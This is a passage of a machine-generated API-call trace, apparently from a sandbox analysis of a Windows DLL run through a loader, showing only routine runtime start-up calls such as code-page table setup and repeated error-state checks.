GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.146] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.146] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.147] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.148] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.148] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.148] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.148] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.148] GetCurrentThreadId () returned 0xaa0 [0031.148] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer" [0031.148] GetEnvironmentStringsW () returned 0x4078b0* [0031.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x5b09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.149] FreeEnvironmentStringsW (penv=0x4078b0) returned 1 [0031.149] GetStartupInfoA (in: lpStartupInfo=0x28f444 | out: lpStartupInfo=0x28f444*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.149] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.149] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.149] SetHandleCount (uNumber=0x20) returned 0x20 [0031.149] GetLastError () returned 0x0 [0031.149] SetLastError (dwErrCode=0x0) [0031.149] GetLastError () returned 0x0 [0031.149] SetLastError (dwErrCode=0x0) [0031.149] GetLastError () returned 0x0 [0031.149] SetLastError (dwErrCode=0x0) [0031.149] GetACP () returned 0x4e4 [0031.149] GetLastError () returned 0x0 [0031.149] SetLastError (dwErrCode=0x0) [0031.149] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.149] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f424 | out: lpCPInfo=0x28f424) returned 1 [0031.149] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28eef0 | out: lpCPInfo=0x28eef0) returned 1 [0031.149] GetLastError () returned 0x0 [0031.149] SetLastError (dwErrCode=0x0) [0031.150] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x28ee80 | out: lpCharType=0x28ee80) returned 1 [0031.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f304, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f304, cbMultiByte=256, lpWideCharStr=0x28ec68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.150] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x28ef04 | out: lpCharType=0x28ef04) returned 1 [0031.150] GetLastError () returned 0x0 [0031.150] SetLastError (dwErrCode=0x0) [0031.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f304, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f304, cbMultiByte=256, lpWideCharStr=0x28ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᗇ矲狟Ā") returned 256 [0031.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᗇ矲狟Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᗇ矲狟Ā", cchSrc=256, lpDestStr=0x28ea28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x28f204, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÑvÌõ<ô(", lpUsedDefaultChar=0x0) returned 256 [0031.150] GetLastError () returned 0x0 [0031.150] SetLastError (dwErrCode=0x0) [0031.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f304, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f304, cbMultiByte=256, lpWideCharStr=0x28ec58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᗇ矲狟Ā") returned 256 [0031.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᗇ矲狟Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.150] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᗇ矲狟Ā", cchSrc=256, lpDestStr=0x28ea48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x28f104, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÑvÌõ<ô(", lpUsedDefaultChar=0x0) returned 256 [0031.150] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.150] GetLastError () returned 0x0 [0031.150] SetLastError (dwErrCode=0x0) [0031.150] GetLastError () returned 0x0 [0031.150] SetLastError (dwErrCode=0x0) [0031.150] GetLastError () returned 0x0 [0031.150] SetLastError (dwErrCode=0x0) [0031.150] GetLastError () returned 0x0 [0031.150] SetLastError (dwErrCode=0x0) [0031.150] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.151] SetLastError (dwErrCode=0x0) [0031.151] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.152] SetLastError (dwErrCode=0x0) [0031.152] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.163] GetLastError () returned 0x0 [0031.163] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.164] SetLastError (dwErrCode=0x0) [0031.164] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.165] SetLastError (dwErrCode=0x0) [0031.165] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.166] GetLastError () returned 0x0 [0031.166] SetLastError (dwErrCode=0x0) [0031.167] GetLastError () returned 0x0 [0031.167] SetLastError 